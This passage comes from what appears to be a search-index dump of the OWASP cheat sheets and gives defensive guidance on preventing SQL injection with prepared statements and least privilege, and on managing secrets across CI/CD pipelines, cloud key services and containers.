$stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');\n$stmt->execute(array('name' => $name));\nforeach ($stmt as $row) {\n    // do something with $row\n}\n
  2. Using MySQLi (for MySQL):
$stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');\n$stmt->bind_param('s', $name);\n$stmt->execute();\n$result = $stmt->get_result();\nwhile ($row = $result->fetch_assoc()) {\n    // do something with $row\n}\n

PDO is the universal option. If you're connecting to a database other than MySQL, you can refer to a driver-specific second option (e.g. pg_prepare() and pg_execute() for PostgreSQL).

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

Beyond adopting one of the four primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful SQL injection attack, you should minimize the privileges assigned to every database account in your environment. Do not assign DBA or admin type access rights to your application accounts. We understand that this is easy, and everything just \"works\" when you do it this way, but it is very dangerous.

Start from the ground up to determine what access rights your application accounts require, rather than trying to figure out what access rights you need to take away. Make sure that accounts that only need read access are only granted read access to the tables they need access to.

If an account only needs access to portions of a table, consider creating a view that limits access to that portion of the data and assigning the account access to the view instead, rather than the underlying table. Rarely, if ever, grant create or delete access to database accounts.

If you adopt a policy where you use stored procedures everywhere, and don't allow application accounts to directly execute their own queries, then restrict those accounts to only be able to execute the stored procedures they need. Don't grant them any rights directly to the tables in the database.

SQL injection is not the only threat to your database data. Attackers can simply change the parameter values from one of the legal values they are presented with, to a value that is unauthorized for them, but the application itself might be authorized to access. As such, minimizing the privileges granted to your application will reduce the likelihood of such unauthorized access attempts, even when an attacker is not trying to use SQL injection as part of their exploit.

While you are at it, you should minimize the privileges of the operating system account that the DBMS runs under. Don't run your DBMS as root or system! Most DBMSs run out of the box with a very powerful system account. For example, MySQL runs as system on Windows by default! Change the DBMS's OS account to something more appropriate, with restricted privileges.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#multiple-db-users","title":"Multiple DB Users","text":"

The designers of web applications should avoid using the same owner/admin account in the web applications to connect to the database. Different DB users should be used for different web applications.

In general, each separate web application that requires access to the database should have a designated database user account that the application will use to connect to the DB. That way, the designer of the application can have good granularity in the access control, thus reducing the privileges as much as possible. Each DB user will then have select access to what it needs only, and write-access as needed.

As an example, a login page requires read access to the username and password fields of a table, but no write access of any form (no insert, update, or delete). However, the sign-up page certainly requires insert privilege to that table; this restriction can only be enforced if these web apps use different DB users to connect to the database.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#views","title":"Views","text":"

You can use SQL views to further increase the granularity of access by limiting the read access to specific fields of a table or joins of tables. It could potentially have additional benefits: for example, suppose that the system is required (perhaps due to some specific legal requirements) to store the passwords of the users, instead of salted-hashed passwords.

The designer could use views to compensate for this limitation; revoke all access to the table (from all DB users except the owner/admin) and create a view that outputs the hash of the password field and not the field itself. Any SQL injection attack that succeeds in stealing DB information will be restricted to stealing the hash of the passwords (could even be a keyed hash), since no DB user for any of the web applications has access to the table itself.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-list Input Validation","text":"

In addition to being a primary defense when nothing else is possible (e.g., when a bind variable isn't legal), input validation can also be a secondary defense used to detect unauthorized input before it is passed to the SQL query. For more information please see the Input Validation Cheat Sheet. Proceed with caution here. Validated data is not necessarily safe to insert into SQL queries via string building.

"},{"location":"cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":"

SQL Injection Attack Cheat Sheets:

The following articles describe how to exploit different kinds of SQL Injection Vulnerabilities on various platforms that this article was created to help you avoid:

Description of SQL Injection Vulnerabilities:

How to Avoid SQL Injection Vulnerabilities:

How to Review Code for SQL Injection Vulnerabilities:

How to Test for SQL Injection Vulnerabilities:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html","title":"Secrets Management Cheat Sheet","text":""},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#1-introduction","title":"1 Introduction","text":"

Secrets are used everywhere nowadays, especially with the popularity of the DevOps movement: Application Programming Interface (API) keys, database credentials, Identity and Access Management (IAM) permissions, Secure Shell (SSH) keys, certificates, etc. Many organizations have them hardcoded within the source code in plaintext, littered throughout configuration files and configuration management tools.

There is a growing need for organizations to centralize the storage, provisioning, auditing, rotation and management of secrets to control access to secrets and prevent them from leaking and compromising the organization. Often, services share the same secrets, which makes identifying the source of compromise or leak challenging.

This cheat sheet offers best practices and guidelines to help properly implement secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#2-general-secrets-management","title":"2 General Secrets Management","text":"

The following sections address the main concepts relating to secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#21-high-availability","title":"2.1 High Availability","text":"

It is vital to select a technology that is robust enough to service traffic reliably:

Such a service could receive a considerable volume of requests within a large organization.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#22-centralize-and-standardize","title":"2.2 Centralize and Standardize","text":"

Secrets used by your DevOps teams for your applications might be consumed differently than secrets stored by your marketeers or your SRE team. You often find poorly maintained secrets where the needs of secret consumers or producers mismatch. Therefore, you must standardize and centralize the secrets management solution with care. Standardizing and centralizing can mean that you use multiple secret management solutions. For instance: your cloud-native development teams choose to use the solution provided by the cloud provider, while your private cloud uses a third-party solution, and everybody has an account for a selected password manager. By making sure that the teams standardize the interaction with these different solutions, they remain maintainable and usable in the event of an incident. Even when a company centralizes its secrets management to just one solution, you will often have to secure the master secret of that secrets management solution in a secondary secrets management solution. For instance, you can use a cloud provider's facilities to store secrets, but that cloud provider's root/management credentials need to be stored somewhere else.

Standardization should include the secrets' life cycle management as well as Authentication, Authorization, and Accounting of the secrets management solution. Note that it should be immediately apparent to an organization what a secret is used for and where to find it. The more secrets management solutions you use, the more documentation you need.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#23-access-control","title":"2.3 Access Control","text":"

When users can read and/or update a secret in a secrets management system, it means that the secret can now leak through that user and the systems they used to touch the secret. Therefore, engineers should not have access to all secrets in the secrets management system, and the Least Privilege principle should be applied. The secrets management system needs to provide the ability to configure fine-grained access controls on each object and component to accomplish the Least Privilege principle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#24-automate-secrets-management","title":"2.4 Automate Secrets Management","text":"

Manual maintenance not only increases the risk of leakage; it also introduces the risk of human error while maintaining the secret. Furthermore, it can become wasteful. Therefore, it is better to limit or remove human interaction with the actual secrets. You can restrict human interaction in multiple ways:

Rotating certain keys, such as encryption keys, might trigger full or partial data re-encryption. Different strategies for rotating keys exist:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#25-auditing","title":"2.5 Auditing","text":"

Auditing is an essential part of secrets management due to the nature of the application. You must implement auditing securely to be resilient against attempts to tamper with or delete the audit logs. At a minimum, you should audit the following:

It is essential that all auditing has correct timestamps. Therefore, the secret management solution should have proper time sync protocols set up at its supporting infrastructure. You should monitor the stack on which the solution runs for possible clock-skew and manual time adjustments.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#26-secret-lifecycle","title":"2.6 Secret Lifecycle","text":"

Secrets follow a lifecycle. The stages of the lifecycle are as follows:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#261-creation","title":"2.6.1 Creation","text":"

New secrets must be securely generated and cryptographically robust enough for their purpose. Secrets must have the minimum privileges assigned to them to enable their required use/role.

You should transmit credentials securely; ideally, you don't send the password along with the username when requesting user accounts. Instead, you should send the password via a secure channel (e.g. a mutually authenticated connection) or a side-channel such as a push notification, SMS, or email. Refer to the Multi-Factor Authentication Cheat Sheet to learn about the pros and cons of each channel.

Applications may not benefit from having multiple communication channels, so you must provision credentials securely.

See the Open CRE project on secrets lookup for more technical recommendations on secret creation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#262-rotation","title":"2.6.2 Rotation","text":"

You should regularly rotate secrets so that any stolen credentials will only work for a short time. Regular rotation will also reduce the tendency for users to fall back to bad habits such as re-using credentials.

Depending on a secret's function and what it protects, the lifetime could be from minutes (think end-to-end encrypted chats with perfect forward secrecy) to years (consider hardware secrets).

User credentials are excluded from regular rotation. These should only be rotated if there is suspicion or evidence that they have been compromised, in accordance with NIST recommendations.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#263-revocation","title":"2.6.3 Revocation","text":"

When secrets are no longer required or potentially compromised, you must securely revoke them to restrict access. With (TLS) certificates, this also involves certificate revocation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#264-expiration","title":"2.6.4 Expiration","text":"

You should create secrets to expire after a defined time where possible. This expiration can either be active expiration by the secret consuming system, or an expiration date set at the secrets management system forcing supporting processes to be triggered, resulting in a secret rotation. You should apply policies through the secrets management solution to ensure credentials are only made available for a limited time appropriate for the type of credentials. Applications should verify that the secret is still active before trusting it.
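
As a trivial sketch of the last point, assuming a hypothetical expiry timestamp carried in the secret's metadata (real solutions expose expiry through their own metadata APIs):

import java.time.Instant;

// Sketch: refuse to use a secret whose (hypothetical) expiry timestamp has passed.
static String requireActive(String secretValue, Instant expiresAt) {
    if (Instant.now().isAfter(expiresAt)) {
        throw new IllegalStateException("Secret has expired; trigger rotation before use");
    }
    return secretValue;
}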

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#27-transport-layer-security-tls-everywhere","title":"2.7 Transport Layer Security (TLS) Everywhere","text":"

Never transmit secrets via plaintext. In this day and age, there is no excuse given the ubiquitous adoption of TLS.

Furthermore, you can effectively use secrets management solutions to provision TLS certificates.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#28-downtime-break-glass-backup-and-restore","title":"2.8 Downtime, Break-glass, Backup and Restore","text":"

Consider the possibility that a secrets management service becomes unavailable for various reasons, such as scheduled downtime for maintenance. It could be impossible to retrieve the credentials required to restore the service if you did not previously acquire them. Thus, choose maintenance windows carefully based on earlier metrics and audit logs.

Next, the backup and restore procedures of the system should be regularly tested and audited for their security. A few requirements regarding backup & restore. Ensure that:

Lastly, you should implement emergency (\"break-glass\") processes to restore the service if the system becomes unavailable for reasons other than regular maintenance. Therefore, emergency break-glass credentials should be regularly backed up securely in a secondary secrets management system and tested routinely to verify they work.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#29-policies","title":"2.9 Policies","text":"

Consistently enforce policies defining the minimum complexity requirements of passwords and approved encryption algorithms at an organization-wide level. Using a centralized secrets management solution can help companies implement these policies.

Next, having an organization-wide secrets management policy can help enforce applying the best practices defined in this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#210-metadata-prepare-to-move-the-secret","title":"2.10 Metadata: prepare to move the secret","text":"

A secret management solution should provide the capability to store at least the following metadata about a secret:

Note: if you don't store metadata about the secret or prepare to move it, you will increase the probability of vendor lock-in.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#3-continuous-integration-ci-and-continuous-deployment-cd","title":"3 Continuous Integration (CI) and Continuous Deployment (CD)","text":"

Building, testing and deploying changes generally requires access to many systems. Continuous Integration (CI) and Continuous Deployment (CD) tools typically store secrets to provide configuration to the application or during deployment. Alternatively, they interact heavily with the secrets management system. Various best practices can help smooth out secret management in CI/CD; we will deal with some of them in this section.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#31-hardening-your-cicd-pipeline","title":"3.1 Hardening your CI/CD pipeline","text":"

CI/CD tooling consumes (high-privilege) credentials regularly. Ensure that the pipeline cannot be easily hacked or misused by employees. Here are a few guidelines which can help you:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#32-where-should-a-secret-be","title":"3.2 Where should a secret be?","text":"

There are various places where you can store a secret to execute CI/CD actions:

Another alternative here is using the CI/CD pipeline to leverage the Encryption as a Service from the secrets management systems to do the encryption of a secret. The CI/CD tooling can then commit the encrypted secret to git, which can be fetched by the consuming service on deployment and decrypted again. See section 3.6 for more details.

Note: not all secrets need to pass through the CI/CD pipeline to get to the actual deployment. Instead, make sure that the deployed services take care of part of their own secrets management during their lifecycle (e.g. deployment, runtime and destruction).

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#321-as-part-of-your-cicd-tooling","title":"3.2.1 As part of your CI/CD tooling","text":"

When secrets are part of your CI/CD tooling, it means that these secrets are exposed to your CI/CD jobs. CI/CD tooling can comprise, e.g. GitHub secrets, GitLab repository secrets, ENV Vars/Var Groups in Microsoft Azure DevOps, Kubernetes Secrets, etc. These secrets are often configurable/viewable by people who have the authorization to do so (e.g. a maintainer in GitHub, a project owner in GitLab, an admin in Jenkins, etc.), which together lines up for the following best practices:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#322-storing-it-in-a-secrets-management-system","title":"3.2.2 Storing it in a secrets management system","text":"

Naturally, you can store secrets in a designated secrets management solution. For example, you can use a solution offered by your (cloud) infrastructure provider, such as AWS Secrets Manager, Google Secrets Manager, or Azure KeyVault. You can find more information about these in section 4 of this cheat sheet. Another option is a dedicated secrets management system, such as Hashicorp Vault, Keeper, Confidant, Conjur. Here are a few do's and don'ts for the CI/CD interaction with these systems. Make sure that the following is taken care of:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#323-not-touched-by-cicd-at-all","title":"3.2.3 Not touched by CI/CD at all","text":"

Secrets do not necessarily need to be brought to a consumer of the secret by a CI/CD pipeline. It is even better when the consumer of the secret retrieves the secret. In that case, the CI/CD pipeline still needs to instruct the orchestrating system (e.g. Kubernetes) that it needs to schedule a specific service with a given service account with which the consumer can then retrieve the required secret. The CI/CD tooling then still has credentials for the orchestrating platform but no longer has access to the secrets themselves. The do's and don'ts regarding these credentials types are similar to those described in section 3.2.2.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#33-authentication-and-authorization-of-cicd-tooling","title":"3.3 Authentication and Authorization of CI/CD tooling","text":"

CI/CD tooling should have designated service accounts, which can only operate in the scope of the required secrets or orchestration of the consumers of a secret. Additionally, a CI/CD pipeline run should be easily attributable to the one who has defined the job or triggered it to detect who has tried to exfiltrate secrets or manipulate them. When you use certificate-based auth, the caller of the pipeline identity should be part of the certificate. If you use a token to authenticate towards the mentioned systems, make sure you set the principal requesting these actions (e.g. the user or the job creator).

Verify on a periodical basis whether this is (still) the case for your system so that you can do logging, attribution, and security alerting on suspicious actions effectively.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#34-logging-and-accounting","title":"3.4 Logging and Accounting","text":"

Attackers can use CI/CD tooling to extract secrets. They could, for example, use administrative interfaces or job creation which exfiltrates the secret using encryption or double base64 encoding. Therefore, you should log every action in a CI/CD tool. You should define security alerting rules at every non-standard manipulation of the pipeline tool and its administrative interface to monitor secret usage. Logs should be queryable for at least 90 days and stored for a more extended period in cold storage. It might take security teams time to understand how attackers can exfiltrate or manipulate a secret using CI/CD tooling.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#35-rotation-vs-dynamic-creation","title":"3.5 Rotation vs Dynamic Creation","text":"

You can leverage CI/CD tooling to rotate secrets or instruct other components to do the rotation of the secret. For instance, the CI/CD tool can request that a secrets management system or another application rotate the secret. Alternatively, the CI/CD tool or another component could set up a dynamic secret: a secret that a consumer can use for as long as that consumer lives, and that is invalidated when the consumer no longer exists. This procedure reduces possible leakage of a secret and allows for easy detection of misuse. If an attacker uses the secret from anywhere other than the consumer's IP, you can easily detect it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#36-pipeline-created-secrets","title":"3.6 Pipeline Created Secrets","text":"

You can use pipeline tooling to generate secrets and either offer them directly to the service deployed by the tooling or provide the secret to a secrets management solution. Alternatively, the secret can be stored encrypted in git so that the secret and its metadata is as close to the developer's daily place of work as possible. A git-stored secret does require that developers cannot decrypt the secrets themselves and that every consumer of a secret has its encrypted variant of the secret. For instance: the secret should then be different per DTAP environment and be encrypted with another key. For each environment, only the designated consumer in that environment should be able to decrypt the specific secret. A secret does not leak cross-environment and can still be easily stored next to the code. Consumers of a secret could now decrypt the secret using a sidecar, as described in section 5.2. Instead of retrieving the secrets, the consumer would leverage the sidecar to decrypt the secret.

When a pipeline creates a secret by itself, ensure that the scripts or binaries involved adhere to best practices for secret generation. Best practices include secure-randomness, proper length of secret creation, etc. and that the secret is created based on well-defined metadata stored somewhere in git or somewhere else.
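
A minimal sketch of such generation, assuming the consuming system accepts a URL-safe Base64 string:

import java.security.SecureRandom;
import java.util.Base64;

// Sketch: generate a 256-bit secret from a cryptographically secure PRNG.
static String generateSecret() {
    byte[] bytes = new byte[32]; // 32 bytes = 256 bits of entropy
    new SecureRandom().nextBytes(bytes);
    return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
}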

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4-cloud-providers","title":"4 Cloud Providers","text":"

For cloud providers, there are at least four essential topics to touch upon:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#41-services-to-use","title":"4.1 Services to Use","text":"

It is best to use a designated secret management solution in any environment. Most cloud providers have at least one service that offers secret management. Of course, it's also possible to run a different secret management solution (e.g. HashiCorp Vault or Conjur) on compute resources within the cloud. We'll consider cloud provider service offerings in this section.

Sometimes it's possible to automatically rotate your secret, either via a service provided by your cloud provider or a (custom-built) function. Generally, you should prefer the cloud provider's solution since the barrier of entry and risk of misconfiguration are lower. If you use a custom solution, ensure the function's role to do its rotation can only be assumed by said function.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#411-aws","title":"4.1.1 AWS","text":"

For AWS, the recommended solution is AWS secret manager.

Permissions are granted at the secret level. Check out the Secrets Manager best practices.
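
For example, fetching a secret at runtime might look roughly like this sketch, assuming the AWS SDK for Java v2 is on the classpath, credentials come from the default provider chain, and "prod/db/password" is a hypothetical secret name:

import software.amazon.awssdk.services.secretsmanager.SecretsManagerClient;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueRequest;

// Sketch: fetch a secret at runtime instead of baking it into code or config.
static String fetchDbPassword() {
    try (SecretsManagerClient client = SecretsManagerClient.create()) {
        return client.getSecretValue(
                GetSecretValueRequest.builder().secretId("prod/db/password").build())
            .secretString();
        // Use the value in memory only; never log it or write it to disk.
    }
}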

It is also possible to use the Systems Manager Parameter Store, which is cheaper, but it has a few downsides:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4111-aws-nitro-enclaves","title":"4.1.1.1 AWS Nitro Enclaves","text":"

With AWS Nitro Enclaves, you can create trusted execution environments. Thus, no human-based access is possible once the application is running. Additionally, enclaves do not have any permanent storage attached to them. Therefore, secrets and other sensitive data stored in Nitro Enclaves have an additional layer of security.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4112-aws-cloudhsm","title":"4.1.1.2 AWS CloudHSM","text":"

For secrets used in highly confidential applications, you may need more control over the encryption and storage of these keys. AWS offers CloudHSM, which lets you bring your own key (BYOK) for AWS services. Thus, you will have more control over keys' creation, lifecycle, and durability. CloudHSM allows automatic scaling and backup of your data. The cloud service provider, Amazon, does not have any access to the key material stored in CloudHSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#412-gcp","title":"4.1.2 GCP","text":"

For GCP, the recommended service is Secret Manager.

Permissions are granted at the secret level.

Check out the Secret Manager best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4121-google-cloud-confidential-computing","title":"4.1.2.1 Google Cloud Confidential Computing","text":"

GCP Confidential Computing allows encryption of data during runtime. Thus, application code and data are kept secret, encrypted, and cannot be accessed by humans or tools.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#413-azure","title":"4.1.3 Azure","text":"

For Azure, the recommended service is Key Vault.

Contrary to other clouds, permissions are granted at the Key Vault level. This means that secrets for separate workloads and separate sensitivity levels should be stored in separate Key Vaults accordingly.

Check out the Key Vault best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4131-azure-confidential-computing","title":"4.1.3.1 Azure Confidential Computing","text":"

With Azure Confidential Computing, you can create trusted execution environments. Every application is executed in an encrypted enclave, so the data and code consumed by the application are protected end-to-end. Furthermore, any application running inside enclaves is not accessible by any tool or human.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4132-azure-dedicated-hsm","title":"4.1.3.2 Azure Dedicated HSM","text":"

For secrets being used in Azure environments and requiring special security considerations, Azure offers Azure Dedicated HSM. This allows you more control over the secrets stored on it, including enhanced administrative and cryptographic control. The cloud service provider, Microsoft, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#414-other-clouds-multi-cloud-and-cloud-agnostic","title":"4.1.4 Other clouds, Multi-cloud, and Cloud agnostic","text":"

If you're using multiple cloud providers, you should consider using a cloud-agnostic secrets management solution. This allows you to use the same solution across all your cloud providers (and possibly also on-premises) and avoids vendor lock-in with a specific provider.

There are open source and commercial solutions available. Some examples are:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#42-envelope-client-side-encryption","title":"4.2 Envelope & client-side encryption","text":"

This section will describe how a secret is encrypted and how you can manage the keys for that encryption in the cloud.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#421-client-side-encryption-versus-server-side-encryption","title":"4.2.1 Client-side encryption versus server-side encryption","text":"

Server-side encryption of secrets ensures that the cloud provider takes care of the encryption of the secret in storage. The secret is then safeguarded against compromise while at rest. Encryption at rest often does not require additional work other than selecting the key to encrypt it with (see section 4.2.2). However, when you submit the secret to another service, it will no longer be encrypted: it is decrypted before sharing with the intended service or human user.

Client-side encryption of secrets ensures that the secret remains encrypted until you actively decrypt it. This means it is only decrypted when it arrives at the consumer. You need a proper crypto system to cater for this: think about mechanisms such as PGP with a safe configuration, or other more scalable and relatively easy-to-use systems. Client-side encryption can provide end-to-end encryption of the secret: from producer to consumer.
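
As a minimal sketch of client-side encryption, the snippet below uses the Fernet recipe from the Python `cryptography` package; how the key is distributed to the consumer (e.g. out of band or via a KMS) is assumed and out of scope here.

```python
from cryptography.fernet import Fernet

# Producer side: encrypt before the secret ever leaves the producer.
key = Fernet.generate_key()                       # must be shared with the consumer securely
ciphertext = Fernet(key).encrypt(b"s3cr3t-value")

# Consumer side: the secret is only decrypted where it is actually used.
plaintext = Fernet(key).decrypt(ciphertext)
```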

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#422-bring-your-own-key-versus-cloud-provider-key","title":"4.2.2 Bring Your Own Key versus Cloud Provider Key","text":"

When you encrypt a secret at rest, the question is: which key do you want to use? The less trust you have in the cloud provider, the more you will want to manage yourself.

Often, you can either encrypt a secret with a key managed at the secrets management service or use a key management solution from the cloud provider to encrypt the secret. The key offered through the key management solution of the cloud provider can be managed either by the cloud provider or by yourself. Industry standards call the latter \"bring your own key\" (BYOK). You can either import or generate this key directly at the key management solution, or use a cloud HSM supported by the cloud provider. You can then use either your own key or the customer master key (CMK) from the provider to encrypt the data key of the secrets management solution. The data key, in turn, encrypts the secret. By managing the CMK, you have control over the data key at the secrets management solution.
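
The sketch below illustrates this envelope pattern locally with the Python `cryptography` package: a per-secret data key encrypts the secret, and the KEK/CMK wraps the data key. In a real setup the KEK stays inside the provider's KMS or HSM and the wrap/unwrap steps are KMS API calls; keeping it in memory here is purely for illustration.

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Key-encryption key (KEK / CMK). In reality this never leaves the KMS or HSM.
kek = AESGCM.generate_key(bit_length=256)

def envelope_encrypt(secret: bytes) -> dict:
    data_key = AESGCM.generate_key(bit_length=256)               # per-secret data key
    nonce_s, nonce_k = os.urandom(12), os.urandom(12)
    encrypted_secret = AESGCM(data_key).encrypt(nonce_s, secret, None)
    wrapped_key = AESGCM(kek).encrypt(nonce_k, data_key, None)   # would be a KMS "encrypt" call
    return {"secret": encrypted_secret, "nonce_s": nonce_s,
            "wrapped_key": wrapped_key, "nonce_k": nonce_k}

def envelope_decrypt(blob: dict) -> bytes:
    data_key = AESGCM(kek).decrypt(blob["nonce_k"], blob["wrapped_key"], None)
    return AESGCM(data_key).decrypt(blob["nonce_s"], blob["secret"], None)
```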

While importing your own key material is generally possible with all providers (AWS, Azure, GCP), this is not a recommended approach due to its complexity and difficulty of use, unless you know what you are doing and your threat model and policy require it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#43-identity-and-access-management-iam","title":"4.3 Identity and Access Management (IAM)","text":"

IAM applies to both on-premise and cloud setups: to effectively manage secrets, you need to set up suitable access policies and roles. Setting this up goes beyond policies regarding secrets; it should include hardening the full IAM setup, as it could otherwise allow for privilege escalation attacks. Ensure you never allow open \"pass role\" privileges or unrestricted IAM creation privileges, as these can use or create credentials that have access to the secrets. Next, make sure you tightly control what can impersonate a service account: are your machines' roles accessible by an attacker exploiting your server? Can service roles from the data-pipeline tooling access the secrets easily? Ensure you include IAM for every cloud component in your threat model (e.g. ask yourself: how can you do elevation of privileges with this component?). See this blog entry for multiple do's and don'ts with examples.

Leverage the temporality of the IAM principals effectively: e.g. ensure that only specific roles and service accounts that require it can access the secrets. Monitor these accounts so that you can tell who or what used them to access the secrets.

Next, make sure that you scope access to your secrets: one should not be simply allowed to access all secrets. In GCP and AWS, you can create fine-grained access policies to ensure that a principal cannot access all secrets at once. In Azure, having access to the key vault means having access to all secrets in that key vault. It is, thus, essential to have separate key vaults when working on Azure to segregate access.
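
As one possible way to scope access in AWS, the sketch below attaches a resource policy to a single secret via boto3's `put_resource_policy`; the account ID, role name, and secret name are placeholders, and the same idea applies to fine-grained policies in GCP.

```python
import json
import boto3

SECRET_ID = "prod/payments/db-password"   # placeholder secret name
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111122223333:role/payments-service"},  # placeholder role
        "Action": "secretsmanager:GetSecretValue",
        "Resource": "*",  # a resource policy applies only to the secret it is attached to
    }],
}

boto3.client("secretsmanager").put_resource_policy(
    SecretId=SECRET_ID,
    ResourcePolicy=json.dumps(policy),
)
```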

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#44-api-limits","title":"4.4 API limits","text":"

Cloud services generally provide a limited number of API calls over a given period. You could potentially (D)DoS yourself when you run into these limits. Most of these limits apply per account, project, or subscription, so spread workloads to limit your blast radius accordingly. Additionally, some services may support data key caching, preventing load on the key management service API (see for example AWS data key caching). Some services can leverage built-in data key caching; S3 is one such example.
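
A minimal sketch of local data key caching is shown below; `generate_data_key` stands in for a hypothetical callable wrapping your provider's key management API, and the age/usage limits should follow the provider's caching guidance.

```python
import time

class DataKeyCache:
    """Cache a data key for a bounded lifetime/usage count to reduce KMS API calls."""

    def __init__(self, generate_data_key, max_age_seconds: int = 300, max_uses: int = 1000):
        self._generate = generate_data_key   # hypothetical callable wrapping the KMS API
        self._max_age = max_age_seconds
        self._max_uses = max_uses
        self._key, self._created, self._uses = None, 0.0, 0

    def get(self) -> bytes:
        expired = (time.monotonic() - self._created) > self._max_age or self._uses >= self._max_uses
        if self._key is None or expired:
            self._key = self._generate()
            self._created, self._uses = time.monotonic(), 0
        self._uses += 1
        return self._key
```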

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#5-containers-orchestrators","title":"5 Containers & Orchestrators","text":"

You can enrich containers with secrets in multiple ways: build time (not recommended) and during orchestration/deployment.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#51-injection-of-secrets-file-in-memory","title":"5.1 Injection of Secrets (file, in-memory)","text":"

There are three ways to get secrets to an app inside a Docker container.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#52-short-lived-side-car-containers","title":"5.2 Short Lived Side-car Containers","text":"

To inject secrets, you could create short-lived sidecar containers that fetch secrets from some remote endpoint and then store them on a shared volume mounted to the original container. The original container can now use the secrets from the mounted volume. The benefit of using this approach is that we don't need to integrate any third-party tool or code to get secrets. Once the sidecar has fetched the secrets, it terminates. Examples of this include Vault Agent Sidecar Injector and Conjur Secrets Provider. By mounting secrets to a volume shared with the pod, containers within the pod can consume secrets without being aware of the secrets manager.
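
To make the pattern concrete, here is a sketch of what such a short-lived sidecar could do: fetch one secret from a secrets manager endpoint and write it to a volume shared with the application container before exiting. The endpoint, token variable, and mount path are assumptions; real injectors such as the Vault Agent handle authentication, renewal, and templating for you.

```python
import os
import requests

SECRETS_ENDPOINT = "https://secrets.example.internal/v1/app/db-password"  # placeholder endpoint
SHARED_VOLUME_PATH = "/run/secrets/db-password"                           # volume mounted into both containers

def main() -> None:
    token = os.environ["SIDECAR_AUTH_TOKEN"]  # e.g. a service account token injected by the orchestrator
    resp = requests.get(SECRETS_ENDPOINT, headers={"Authorization": f"Bearer {token}"}, timeout=5)
    resp.raise_for_status()
    # Write with restrictive permissions so only the application user inside the pod can read it.
    fd = os.open(SHARED_VOLUME_PATH, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o400)
    with os.fdopen(fd, "w") as f:
        f.write(resp.json()["value"])
    # The sidecar terminates here; the main container reads the secret from the shared volume.

if __name__ == "__main__":
    main()
```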

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#53-internal-vs-external-access","title":"5.3 Internal vs External Access","text":"

You should only expose secrets to communication mechanisms between the container and the deployment representation (e.g. a Kubernetes Pod). Never expose secrets through external access mechanisms shared among deployments or orchestrators (e.g. a shared volume).

When the orchestrator stores secrets (e.g. Kubernetes Secrets), make sure that the storage backend of the orchestrator is encrypted and you manage the keys well. See the Kubernetes Security Cheat Sheet for more information.

